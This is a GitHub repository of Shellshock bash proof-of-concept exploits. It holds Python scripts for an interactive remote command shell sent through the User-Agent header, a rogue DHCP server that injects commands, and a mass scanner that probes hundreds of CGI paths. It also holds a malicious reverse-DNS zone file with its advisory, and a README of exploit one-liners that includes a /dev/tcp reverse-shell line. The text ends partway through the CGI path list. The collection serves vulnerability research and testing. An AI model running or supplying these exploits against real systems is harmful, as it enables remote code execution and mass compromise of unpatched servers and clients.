├── w3af_shocker.py ├── shell_shocker.py ├── osx-rev-ptr ├── in-addr.arpa.zone ├── osx-rev-ptr.c └── CVE-2014-3671.txt ├── LICENSE ├── dhcpshock.py ├── README.md └── shell_sprayer.py /w3af_shocker.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import os, sys 4 | from time import sleep 5 | 6 | if len(sys.argv) != 2: 7 | print "Usage: shell_shocker " 8 | sys.exit(0) 9 | 10 | target=sys.argv[1] 11 | # Creates a temporary w3af audit file 12 | fname='w3af_'+target.split('/')[2]+".w3af" 13 | 14 | f=open(fname, 'w') 15 | # Audit file will enable web_spider, and plugin named "shell_shock" 16 | # You may need to modify plugin names for your setup 17 | f.write("plugins\n") 18 | f.write("crawl web_spider\n") 19 | f.write("audit shell_shock\n") 20 | f.write("back\n") 21 | f.write("\n") 22 | f.write("target\n") 23 | f.write("set target "+target+"\n") 24 | f.write("back\n") 25 | f.write("\n") 26 | f.write("start") 27 | f.close() 28 | 29 | # Invoke w3af_console with audit script 30 | os.system("w3af_console -s "+fname) 31 | sleep(2) 32 | # Remove audit script 33 | os.system("rm "+fname) 34 | 35 | -------------------------------------------------------------------------------- /shell_shocker.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # Successful Output: 4 | # # python shell_shocker.py 5 | # [+] Attempting Shell_Shock - Make sure to type full path 6 | # ~$ /bin/ls / 7 | # bin 8 | # boot 9 | # dev 10 | # etc 11 | # .. 12 | # ~$ /bin/cat /etc/passwd 13 | 14 | import sys, urllib2 15 | 16 | if len(sys.argv) != 2: 17 | print "Usage: shell_shocker " 18 | sys.exit(0) 19 | 20 | URL=sys.argv[1] 21 | print "[+] Attempting Shell_Shock - Make sure to type full path" 22 | 23 | while True: 24 | command=raw_input("~$ ") 25 | opener=urllib2.build_opener() 26 | opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)] 27 | try: 28 | response=opener.open(URL) 29 | for line in response.readlines(): 30 | print line.strip() 31 | except Exception as e: print e 32 | 33 | -------------------------------------------------------------------------------- /osx-rev-ptr/in-addr.arpa.zone: -------------------------------------------------------------------------------- 1 | ; See the CVE-2014-3671 advisory. 2 | ; 3 | ; Copyright 2014 Dirk-Willem van Gulik, All Rights Reserved. 4 | ; 5 | ; 6 | ; Licensed under the Apache License, Version 2.0 (the "License"); 7 | ; you may not use this file except in compliance with the License. 8 | ; You may obtain a copy of the License at 9 | ; 10 | ; http://www.apache.org/licenses/LICENSE-2.0 11 | ; 12 | ; Unless required by applicable law or agreed to in writing, software 13 | ; distributed under the License is distributed on an "AS IS" BASIS, 14 | ; WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 15 | ; See the License for the specific language governing permissions and 16 | ; limitations under the License. 17 | ; 18 | 19 | $TTL 10; 20 | $ORIGIN in-addr.arpa. 21 | 22 | @ IN SOA ns.boem.wleiden.net dirkx.webweaving.org ( 23 | 666 ; serial 24 | 360 180 3600 1800 ; Intentioanlly absurdly short livespans. 25 | ) 26 | IN NS 127.0.0.1 27 | ; Exploit string; 63 char limit. 28 | * IN PTR "() { :;}; echo CVE-2014-6271, CVE-201407169, RDNS" 29 | 30 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | The MIT License (MIT) 2 | 3 | Copyright (c) 2014 Rob Fuller 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | 23 | -------------------------------------------------------------------------------- /osx-rev-ptr/osx-rev-ptr.c: -------------------------------------------------------------------------------- 1 | /* See the CVE-2014-3671 advisory. 2 | * 3 | * Copyright 2014 Dirk-Willem van Gulik, All Rights Reserved. 4 | * , 5 | * 6 | * Licensed under the Apache License, Version 2.0 (the "License"); 7 | * you may not use this file except in compliance with the License. 8 | * You may obtain a copy of the License at 9 | * 10 | * http://www.apache.org/licenses/LICENSE-2.0 11 | * 12 | * Unless required by applicable law or agreed to in writing, software 13 | * distributed under the License is distributed on an "AS IS" BASIS, 14 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 15 | * See the License for the specific language governing permissions and 16 | * limitations under the License. 17 | */ 18 | 19 | 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | 29 | int main(int argc, char ** argv) { 30 | struct in_addr addr; 31 | struct sockaddr_in sa; 32 | char host[1024]; 33 | 34 | assert(argc==2); 35 | assert(inet_aton(argv[1],&addr) == 1); 36 | 37 | sa.sin_family = AF_INET; 38 | sa.sin_addr = addr; 39 | 40 | assert(0==getnameinfo((struct sockaddr *)&sa, sizeof sa, 41 | host, sizeof host, NULL, 0, NI_NAMEREQD)); 42 | 43 | printf("Lookup result: %s\n\n", host); 44 | 45 | assert(setenv("REMOTE_HOST",host,1) == 0); 46 | execl("/bin/bash",NULL); 47 | } 48 | 49 | -------------------------------------------------------------------------------- /dhcpshock.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | #Based on the PoC from https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/ 4 | #Created by @byt3bl33d3r 5 | 6 | import binascii 7 | import argparse 8 | import logging 9 | logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy 10 | 11 | from scapy.all import * 12 | 13 | parser = argparse.ArgumentParser(description='DHCPShock', epilog='Shock dem shells!') 14 | parser.add_argument('-i', '--iface', type=str, required=True, help='Interface to use') 15 | parser.add_argument('-c', '--cmd', type=str, help='Command to execute [default: "echo pwned"]') 16 | 17 | args = parser.parse_args() 18 | 19 | command = args.cmd or "echo 'pwned'" 20 | 21 | if os.geteuid() != 0: 22 | sys.exit("Run me as r00t") 23 | 24 | #BOOTP 25 | #siaddr = DHCP server ip 26 | #yiaddr = ip offered to client 27 | #xid = transaction id 28 | #chaddr = clients mac address in binary format 29 | 30 | def dhcp_offer(raw_mac, xid): 31 | packet = (Ether(src=get_if_hwaddr(args.iface), dst='ff:ff:ff:ff:ff:ff') / 32 | IP(src="192.168.2.1", dst='255.255.255.255') / 33 | UDP(sport=67, dport=68) / 34 | BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr='192.168.2.4', siaddr='192.168.2.1', xid=xid) / 35 | DHCP(options=[("message-type", "offer"), 36 | ('server_id', '192.168.2.1'), 37 | ('subnet_mask', '255.255.255.0'), 38 | ('router', '192.168.2.5'), 39 | ('lease_time', 172800), 40 | ('renewal_time', 86400), 41 | ('rebinding_time', 138240), 42 | "end"])) 43 | 44 | return packet 45 | 46 | 47 | def dhcp_ack(raw_mac, xid, command): 48 | packet = (Ether(src=get_if_hwaddr(args.iface), dst='ff:ff:ff:ff:ff:ff') / 49 | IP(src="192.168.2.1", dst='255.255.255.255') / 50 | UDP(sport=67, dport=68) / 51 | BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr='192.168.2.4', siaddr='192.168.2.1', xid=xid) / 52 | DHCP(options=[("message-type", "ack"), 53 | ('server_id', '192.168.2.1'), 54 | ('subnet_mask', '255.255.255.0'), 55 | ('router', '192.168.2.5'), 56 | ('lease_time', 172800), 57 | ('renewal_time', 86400), 58 | ('rebinding_time', 138240), 59 | (114, "() { ignored;}; " + command), 60 | "end"])) 61 | 62 | return packet 63 | 64 | 65 | def dhcp(resp): 66 | if resp.haslayer(DHCP): 67 | mac_addr = resp[Ether].src 68 | raw_mac = binascii.unhexlify(mac_addr.replace(":", "")) 69 | 70 | if resp[DHCP].options[0][1] == 1: 71 | xid = resp[BOOTP].xid 72 | print "[*] Got dhcp DISCOVER from: " + mac_addr + " xid: " + hex(xid) 73 | print "[*] Sending OFFER..." 74 | packet = dhcp_offer(raw_mac, xid) 75 | #print hexdump(packet) 76 | #print packet.show() 77 | sendp(packet, iface=args.iface) 78 | 79 | if resp[DHCP].options[0][1] == 3: 80 | xid = resp[BOOTP].xid 81 | print "[*] Got dhcp REQUEST from: " + mac_addr + " xid: " + hex(xid) 82 | print "[*] Sending ACK..." 83 | packet = dhcp_ack(raw_mac, xid, command) 84 | #print hexdump(packet) 85 | #print packet.show() 86 | sendp(packet, iface=args.iface) 87 | 88 | print "[*] Waiting for a DISCOVER..." 89 | sniff(filter="udp and (port 67 or 68)", prn=dhcp, iface=args.iface) 90 | -------------------------------------------------------------------------------- /osx-rev-ptr/CVE-2014-3671.txt: -------------------------------------------------------------------------------- 1 | -----BEGIN PGP SIGNED MESSAGE----- 2 | Hash: SHA1 3 | 4 | Security Advisory 5 | 6 | DNS Reverse Lookup as a vector for the Bash vulnerability (CVE-2014-6271 et.al.) 7 | 8 | CVE-2014-3671 9 | 10 | references: 11 | CVE-2014-6271, CVE-2014-7169, CVE-2014-6277, CVE-2014-6278 12 | CVE-2014-7186 and, CVE-2014-7187 13 | 14 | * Summary: 15 | 16 | Above CVEs detail a number of flaws in bash prior related to the parsing 17 | of environment variables (aka BashBug, Shellshock). Several networked 18 | vectors for triggering this bug have been discovered; such as through 19 | dhcp options and CGI environment variables in webservers [1]. 20 | 21 | This document is to advise you of an additional vector; through a 22 | reverse lookup in DNS; and where the results of this lookup are 23 | passed, unsanitized, to an environment variable (e.g. as part of 24 | a batch process). 25 | 26 | This vector is subtly different from a normal attack vector, as the 27 | attacker can 'sit back' and let a (legitimate) user trigger the 28 | issue; hence keeping the footprint for a IDS or WAAS to act on small. 29 | 30 | * Resolvers/systems affected: 31 | 32 | At this point of time the stock resolvers (in combination with the libc 33 | library) of OSX 10.9 (all versions) and 10.10/R2 are the only known 34 | standard installations that pass the bash exploit string back and 35 | up to getnameinfo(). 36 | 37 | That means that UNpatched systems are vulnerable through this vector 38 | PRIOR to the bash update documented in http://support.apple.com/kb/DL1769. 39 | 40 | Most other OS-es (e.g. RHEL6, Centos, FreeBSD 7 and up, seem 41 | unaffected in their stock install as libc/libresolver and DNS use 42 | different escaping mechanisms (octal v.s. decimal). 43 | 44 | We're currently following investing a number of async DNS resolvers 45 | that are commonly used in DB cache/speed optimising products and 46 | application level/embedded firewall systems. 47 | 48 | Versions affected: 49 | 50 | See above CVEs as your primary source. 51 | 52 | * Resolution and Mitigation: 53 | 54 | In addition to the mitigations listed in above CVEs - IDSes and similar 55 | systems may be configured to parse DNS traffic in order to spot the 56 | offending strings. 57 | 58 | Also note that Apple DL1769 addresses the Bash issue; NOT the vector 59 | through the resolver. 60 | 61 | * Reproducing the flaw: 62 | 63 | A simple zone file; such as: 64 | 65 | $TTL 10; 66 | $ORIGIN in-addr.arpa. 67 | @ IN SOA ns.boem.wleiden.net dirkx.webweaving.org ( 68 | 666 ; serial 69 | 360 180 3600 1800 ; very short lifespan. 70 | ) 71 | IN NS 127.0.0.1 72 | * PTR "() { :;}; echo CVE-2014-6271, CVE-201407169, RDNS" 73 | 74 | can be used to create an environment in which to test the issue with existing code 75 | or with the following trivial example: 76 | 77 | #include 78 | #include 79 | #include 80 | #include 81 | #include 82 | #include 83 | #include 84 | #include 85 | 86 | int main(int argc, char ** argv) { 87 | struct in_addr addr; 88 | struct sockaddr_in sa; 89 | char host[1024]; 90 | 91 | assert(argc==2); 92 | assert(inet_aton(argv[1],&addr) == 1); 93 | 94 | sa.sin_family = AF_INET; 95 | sa.sin_addr = addr; 96 | 97 | assert(0==getnameinfo((struct sockaddr *)&sa, sizeof sa, 98 | host, sizeof host, NULL, 0, NI_NAMEREQD)); 99 | 100 | printf("Lookup result: %s\n\n", host); 101 | 102 | assert(setenv("REMOTE_HOST",host,1) == 0); 103 | execl("/bin/bash",NULL); 104 | } 105 | 106 | 107 | Credits and timeline 108 | 109 | The flaw was found and reported by Stephane Chazelas (see CVE-2014-6271 110 | for details). Dirk-Willem van Gulik (dirkx(at)webweaving.org) found 111 | the DNS reverse lookup vector. 112 | 113 | 09-04-2011 first reported. 114 | 2011, 2014 issue verified on various embedded/firewall/waas 115 | systems and reported to vendors. 116 | ??-09-2014 Apple specific exploited seen. 117 | 11-10-2014 Apple confirms that with DL1769 in place that 118 | "The issue that remains, while it raises 119 | interesting questions, is not a security 120 | issue in and of itself." 121 | 122 | * Common Vulnerability Scoring (Version 2) and vector: 123 | 124 | See CVE-2014-6271. 125 | 126 | 1:https://github.com/mubix/shellshocker-pocs/blob/master/README.md) 127 | 1.10 / : 1726 $ 128 | -----BEGIN PGP SIGNATURE----- 129 | Version: GnuPG/MacGPG2 v2.0.22 (Darwin) 130 | Comment: This message is encrypted and/or signed with PGP (gnu-pg, gpg). Contact dirkx@webweaving.org if you cannot read it. 131 | 132 | iQCVAwUBVDujjDGmPZbsFAuBAQKGqwP+OOzdL8PDZF7Ckpk1UCxZZoWYvvGUHBqs 133 | dE8ioLaQsRDKJ+V2EbBGHmSucYLPqBVfRYaYar21KCl6DAcxzQmxhymxxpRjBPsP 134 | uauqW7dYZQASDkKG9Rn0KA4dXNo9GjrJMrTcwkfkoNb5EtVtiMDX8VXoZ4SqLJS0 135 | v5s8ZtQiIw4= 136 | =I6vK 137 | -----END PGP SIGNATURE----- 138 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | Shellshocker - Repository of "Shellshock" Proof of Concept Code 2 | ================= 3 | 4 | Collection of Proof of Concepts and Potential Targets for #ShellShocker 5 | 6 | Wikipedia Link: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details 7 | 8 | Please submit a pull request if you have more links or other resources 9 | 10 | **Speculation:(Non-confirmed possibly vulnerable)** 11 | 12 | + XMPP(ejabberd) 13 | + ~~Mailman~~ - [confirmed not vulnerable](http://www.mail-archive.com/mailman-users%40python.org/msg65380.html) 14 | + MySQL 15 | + NFS 16 | + Bind9 17 | + Procmail [see](https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html) 18 | + Exim [see](https://www.dfranke.us/posts/2014-09-27-shell-shock-exploitation-vectors.html) 19 | + Juniper Google Search`inurl:inurl:/dana-na/auth/url_default/welcome.cgi` 20 | + via: https://twitter.com/notsosecure/status/516132301025984512 21 | + via: http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648&actp=RSS 22 | + Cisco Gear 23 | + via: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash 24 | + FreePB / Asterix [patched here](http://community.freepbx.org/t/cve-2014-6271-shellshock-bash-exploit/24431) 25 | 26 | **If you know of PoCs for any of these, please submit an issue or pull request with a link.** 27 | 28 | ## Command Line (Linux, OSX, and Windows via Cygwin) 29 | 30 | + [bashcheck](https://github.com/hannob/bashcheck) - script to test for the latest vulns 31 | 32 | ### CVE-2014-6271 33 | + `env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id` 34 | 35 | ### CVE-2014-7169 36 | _will create a file named echo in cwd with date in it, if vulnerable_ 37 | + `env X='() { (a)=>\' bash -c "echo date"; cat echo` 38 | 39 | ### CVE-2014-7186 40 | + `bash -c 'true <& /dev/tcp/REVERSESHELLIP/PORT 0>&1'` 100 | + (necessary to have a git account on the server) 101 | 102 | ## OSX 103 | + Priv Escalation via VMware Fusion - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb 104 | + Fix: http://support.apple.com/kb/DL1769 105 | 106 | ## OSX - with reverse DNS (CVE-2014-3671.txt) 107 | + Example zone file: [in-addr.arpa](osx-rev-ptr/in-addr.arpa.zone) that contains a CVE-2014-6271 example. 108 | + Example file with a getnameinfo() that passes on to setenv(): [osx-rev-ptr.c](osx-rev-ptr/osx-rev-ptr.c) 109 | + Advisory with description of above [CVE-2014-3671.txt ](osx-rev-ptr/CVE-2014-3671.txt) 110 | 111 | ## SIP 112 | + SIP Proxies: https://github.com/zaf/sipshock 113 | 114 | 115 | ## Qmail 116 | + Detailed walkthrough - http://marc.info/?l=qmail&m=141183309314366&w=2 117 | + Tweet from @ymzkei5 - http://twitter.com/ymzkei5/status/515328039765307392 118 | + http://twitpic.com/ec3615 119 | + http://twitpic.com/ec361o 120 | 121 | ## Postfix 122 | + http://packetstormsecurity.com/files/128572/postfixsmtp-shellshock.txt 123 | 124 | ## FTP 125 | + Pure-FTPd: https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc 126 | + Metasploit Exploit Module - [Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/ftp/pureftpd_bash_env_exec.rb) 127 | 128 | ## OpenVPN 129 | + OpenVPN - https://news.ycombinator.com/item?id=8385332 130 | + PoC Walkthrough by @fj33r - http://sprunge.us/BGjP 131 | 132 | ## Oracle 133 | + [Alert and list of affected Products](http://www.oracle.com/technetwork/topics/security/alert-cve-2014-7169-2303276.html) 134 | 135 | ## TMNT 136 | + https://twitter.com/SynAckPwn/status/514961810320293888/photo/1 137 | 138 | ## Hand 139 | + Via @DJManilaIce - http://pastie.org/9601055 140 | ``` 141 | user@localhost:~$ env X='() { (a)=>\' /bin/bash -c "shellshocker echo -e \" __ __\n / V \ \n _ | | |\n / \ | | |\n | | | | |\n | | | | |\n | |__| | |\n | | \ |___|___\n | \ |/ \ \n | | |______ |\n | | | |\n | \__' / |\n \ \( /\n \ /\n \| |\n\""; cat shellshocker 142 | /bin/bash: X: line 1: syntax error near unexpected token `=' 143 | /bin/bash: X: line 1: `' 144 | /bin/bash: error importing function definition for `X' 145 | __ __ 146 | / V \ 147 | _ | | | 148 | / \ | | | 149 | | | | | | 150 | | | | | | 151 | | |__| | | 152 | | | \ |___|___ 153 | | \ |/ \ 154 | | | |______ | 155 | | | | | 156 | | \__' / | 157 | \ \( / 158 | \ / 159 | \| | 160 | 161 | ``` 162 | 163 | ## CUPS 164 | + Metasploit Exploit Module - [CUPS Filter Bash Environment Variable Code Injection](https://github.com/rapid7/metasploit-framework/pull/4050) 165 | 166 | ## IRC 167 | + Metasploit Exploit Module - [Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/xdh_x_exec.rb) 168 | + Metasploit Exploit Module - [Legend Perl IRC Bot Remote Code Execution](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/legend_bot_exec.rb) 169 | 170 | ## Scripts from @primalsec 171 | + `shell_shocker.py` - Good for interacting with a known vulnerable URL to pass commands (User-Agent Method) 172 | + `w3af_shocker.py` - Automates the process of running a w3af spider/shell\_shock scan (User-Agent Method) 173 | + `shell_sprayer.py` - Checks across a list of URLs in a file, or a single URL against a known list of cgi-bin resources (User-Agent Method) 174 | -------------------------------------------------------------------------------- /shell_sprayer.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import urllib2, sys, optparse 4 | 5 | def scanner(RHOST): 6 | opener = urllib2.build_opener() 7 | # Modify User-agent header value for Shell Shock test 8 | opener.addheaders = [('User-agent', '() { :;}; echo Content-Type: text/plain ; echo "TEST: TEST"')] 9 | for req in reqs: 10 | try: 11 | URL = RHOST.strip()+req.strip() 12 | response = opener.open(URL) 13 | headers = response.info() 14 | # Check server response headers for string 'TEST: TEST' 15 | if 'TEST: TEST' in str(headers): 16 | print URL+": is vulnerable!:" 17 | print headers 18 | print URL+": "+str(response.getcode()) 19 | 20 | except Exception as e: 21 | print URL +": "+str(e) 22 | 23 | def main(): 24 | parser = optparse.OptionParser(sys.argv[0]+' -r || -i without ending slash') 25 | parser.add_option('-r', dest='RHOSTS', type='string', help='specify target file with URLs') 26 | parser.add_option('-i', dest='RHOST', type='string', help='specify target URL') 27 | (options, args) = parser.parse_args() 28 | RHOSTS=options.RHOSTS 29 | RHOST=options.RHOST 30 | global reqs 31 | # Resources to request 32 | reqs=['/', '/cgi-bin/status', '/_mt/mt.cgi', '/admin.cgi', '/administrator.cgi', '/agora.cgi', '/aktivate/cgi-bin/catgy.cgi', '/analyse.cgi', '/apps/web/vs_diag.cgi', '/axis-cgi/buffer/command.cgi', '/bandwidth/index.cgi', '/bigconf.cgi', '/cart.cgi', '/cartcart.cgi', '/ccbill/whereami.cgi', '/cgi-bin-sdb/printenv', '/cgi-bin/.cobalt/alert/service.cgi', '/cgi-bin/.cobalt/message/message.cgi', '/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi', '/cgi-bin/.namazu.cgi', '/cgi-bin/14all-1.1.cgi', '/cgi-bin/14all.cgi', '/cgi-bin/a1disp3.cgi', '/cgi-bin/a1stats/a1disp3.cgi', '/cgi-bin/a1stats/a1disp4.cgi', '/cgi-bin/add_ftp.cgi', '/cgi-bin/addbanner.cgi', '/cgi-bin/adduser.cgi', '/cgi-bin/admin.cgi', '/cgi-bin/admin.pl', '/cgi-bin/admin/admin.cgi', '/cgi-bin/admin/setup.cgi', '/cgi-bin/adminhot.cgi', '/cgi-bin/adminwww.cgi', '/cgi-bin/af.cgi', '/cgi-bin/aglimpse.cgi', '/cgi-bin/alienform.cgi', '/cgi-bin/AnyBoard.cgi', '/cgi-bin/architext_query.cgi', '/cgi-bin/astrocam.cgi', '/cgi-bin/AT-admin.cgi', '/cgi-bin/AT-generate.cgi', '/cgi-bin/auction/auction.cgi', '/cgi-bin/auktion.cgi', '/cgi-bin/ax-admin.cgi', '/cgi-bin/ax.cgi', '/cgi-bin/axs.cgi', '/cgi-bin/badmin.cgi', '/cgi-bin/banner.cgi', '/cgi-bin/bannereditor.cgi', '/cgi-bin/bb-ack.sh', '/cgi-bin/bb-hist.sh', '/cgi-bin/bb-histlog.sh', '/cgi-bin/bb-hostsvc.sh', '/cgi-bin/bb-rep.sh', '/cgi-bin/bb-replog.sh', '/cgi-bin/bbs_forum.cgi', '/cgi-bin/bigconf.cgi', '/cgi-bin/bizdb1-search.cgi', '/cgi-bin/blog/mt-check.cgi', '/cgi-bin/blog/mt-load.cgi', '/cgi-bin/bnbform.cgi', '/cgi-bin/book.cgi', '/cgi-bin/boozt/admin/index.cgi', '/cgi-bin/bsguest.cgi', '/cgi-bin/bslist.cgi', '/cgi-bin/build.cgi', '/cgi-bin/bulk/bulk.cgi', '/cgi-bin/c_download.cgi', '/cgi-bin/cached_feed.cgi', '/cgi-bin/cachemgr.cgi', '/cgi-bin/calendar/index.cgi', '/cgi-bin/cartmanager.cgi', '/cgi-bin/cbmc/forums.cgi', '/cgi-bin/ccvsblame.cgi', '/cgi-bin/cgforum.cgi', '/cgi-bin/cgi_process', '/cgi-bin/classified.cgi', '/cgi-bin/classifieds.cgi', '/cgi-bin/classifieds/classifieds.cgi', '/cgi-bin/classifieds/index.cgi', '/cgi-bin/commandit.cgi', '/cgi-bin/commerce.cgi', '/cgi-bin/common/listrec.pl', '/cgi-bin/compatible.cgi', '/cgi-bin/Count.cgi', '/cgi-bin/csChatRBox.cgi', '/cgi-bin/csGuestBook.cgi', '/cgi-bin/csLiveSupport.cgi', '/cgi-bin/CSMailto.cgi', '/cgi-bin/CSMailto/CSMailto.cgi', '/cgi-bin/csNews.cgi', '/cgi-bin/csNewsPro.cgi', '/cgi-bin/csPassword.cgi', '/cgi-bin/csPassword/csPassword.cgi', '/cgi-bin/csSearch.cgi', '/cgi-bin/csv_db.cgi', '/cgi-bin/cvsblame.cgi', '/cgi-bin/cvslog.cgi', '/cgi-bin/cvsquery.cgi', '/cgi-bin/cvsqueryform.cgi', '/cgi-bin/day5datacopier.cgi', '/cgi-bin/day5datanotifier.cgi', '/cgi-bin/db_manager.cgi', '/cgi-bin/dbman/db.cgi', '/cgi-bin/dcforum.cgi', '/cgi-bin/dfire.cgi', '/cgi-bin/diagnose.cgi', '/cgi-bin/dig.cgi', '/cgi-bin/directorypro.cgi', '/cgi-bin/download.cgi', '/cgi-bin/emu/html/emumail.cgi', '/cgi-bin/emumail.cgi', '/cgi-bin/emumail/emumail.cgi', '/cgi-bin/enter.cgi', '/cgi-bin/environ.cgi', '/cgi-bin/ezadmin.cgi', '/cgi-bin/ezboard.cgi', '/cgi-bin/ezman.cgi', '/cgi-bin/ezshopper/loadpage.cgi', '/cgi-bin/ezshopper/search.cgi', '/cgi-bin/ezshopper2/loadpage.cgi', '/cgi-bin/ezshopper3/loadpage.cgi', '/cgi-bin/faqmanager.cgi', '/cgi-bin/FileSeek.cgi', '/cgi-bin/FileSeek2.cgi', '/cgi-bin/finger.cgi', '/cgi-bin/flexform.cgi', '/cgi-bin/fom.cgi', '/cgi-bin/fom/fom.cgi', '/cgi-bin/FormHandler.cgi', '/cgi-bin/FormMail.cgi', '/cgi-bin/gbadmin.cgi', '/cgi-bin/gbook/gbook.cgi', '/cgi-bin/generate.cgi', '/cgi-bin/getdoc.cgi', '/cgi-bin/gH.cgi', '/cgi-bin/gm-authors.cgi', '/cgi-bin/gm-cplog.cgi', '/cgi-bin/gm.cgi', '/cgi-bin/guestbook.cgi', '/cgi-bin/handler', '/cgi-bin/handler.cgi', '/cgi-bin/handler/netsonar', '/cgi-bin/hitview.cgi', '/cgi-bin/hsx.cgi', '/cgi-bin/html2chtml.cgi', '/cgi-bin/html2wml.cgi', '/cgi-bin/htsearch.cgi', '/cgi-bin/icat', '/cgi-bin/if/admin/nph-build.cgi', '/cgi-bin/ikonboard/help.cgi', '/cgi-bin/imageFolio.cgi', '/cgi-bin/ImageFolio/admin/admin.cgi', '/cgi-bin/infosrch.cgi', '/cgi-bin/jammail.pl', '/cgi-bin/journal.cgi', '/cgi-bin/lastlines.cgi', '/cgi-bin/loadpage.cgi', '/cgi-bin/log-reader.cgi', '/cgi-bin/login.cgi', '/cgi-bin/logit.cgi', '/cgi-bin/lookwho.cgi', '/cgi-bin/lwgate.cgi', '/cgi-bin/MachineInfo', '/cgi-bin/magiccard.cgi', '/cgi-bin/mail/emumail.cgi', '/cgi-bin/mail/nph-mr.cgi', '/cgi-bin/maillist.cgi', '/cgi-bin/mailnews.cgi', '/cgi-bin/main.cgi', '/cgi-bin/main_menu.pl', '/cgi-bin/man.sh', '/cgi-bin/mini_logger.cgi', '/cgi-bin/mmstdod.cgi', '/cgi-bin/moin.cgi', '/cgi-bin/mojo/mojo.cgi', '/cgi-bin/mrtg.cgi', '/cgi-bin/mt-static/mt-check.cgi', '/cgi-bin/mt-static/mt-load.cgi', '/cgi-bin/mt/mt-check.cgi', '/cgi-bin/mt/mt-load.cgi', '/cgi-bin/musicqueue.cgi', '/cgi-bin/myguestbook.cgi', '/cgi-bin/netauth.cgi', '/cgi-bin/netpad.cgi', '/cgi-bin/newsdesk.cgi', '/cgi-bin/nlog-smb.cgi', '/cgi-bin/nph-emumail.cgi', '/cgi-bin/nph-exploitscanget.cgi', '/cgi-bin/nph-publish.cgi', '/cgi-bin/nph-test.cgi', '/cgi-bin/pagelog.cgi', '/cgi-bin/pbcgi.cgi', '/cgi-bin/perlshop.cgi', '/cgi-bin/pfdispaly.cgi', '/cgi-bin/pfdisplay.cgi', '/cgi-bin/phf.cgi', '/cgi-bin/photo/manage.cgi', '/cgi-bin/photo/protected/manage.cgi', '/cgi-bin/php.cgi', '/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi', '/cgi-bin/pollssi.cgi', '/cgi-bin/postcards.cgi', '/cgi-bin/powerup/r.cgi', '/cgi-bin/printenv', '/cgi-bin/probecontrol.cgi', '/cgi-bin/profile.cgi', '/cgi-bin/publisher/search.cgi', '/cgi-bin/quickstore.cgi', '/cgi-bin/quizme.cgi', '/cgi-bin/r.cgi', '/cgi-bin/ratlog.cgi', '/cgi-bin/register.cgi', '/cgi-bin/replicator/webpage.cgi/', '/cgi-bin/responder.cgi', '/cgi-bin/robadmin.cgi', '/cgi-bin/robpoll.cgi', '/cgi-bin/sbcgi/sitebuilder.cgi', '/cgi-bin/scoadminreg.cgi', '/cgi-bin/search', '/cgi-bin/search.cgi', '/cgi-bin/search/search.cgi', '/cgi-bin/sendform.cgi', '/cgi-bin/shop.cgi', '/cgi-bin/shopper.cgi', '/cgi-bin/shopplus.cgi', '/cgi-bin/showcheckins.cgi', '/cgi-bin/simplestguest.cgi', '/cgi-bin/simplestmail.cgi', '/cgi-bin/smartsearch.cgi', '/cgi-bin/smartsearch/smartsearch.cgi', '/cgi-bin/snorkerz.bat', '/cgi-bin/snorkerz.cmd', '/cgi-bin/sojourn.cgi', '/cgi-bin/spin_client.cgi', '/cgi-bin/start.cgi', '/cgi-bin/store.cgi', '/cgi-bin/store/agora.cgi', '/cgi-bin/store/index.cgi', '/cgi-bin/survey.cgi', '/cgi-bin/talkback.cgi', '/cgi-bin/technote/main.cgi', '/cgi-bin/test-cgi', '/cgi-bin/test.cgi', '/cgi-bin/test/test.cgi', '/cgi-bin/test2.pl', '/cgi-bin/testing_whatever', '/cgi-bin/tidfinder.cgi', '/cgi-bin/tigvote.cgi', 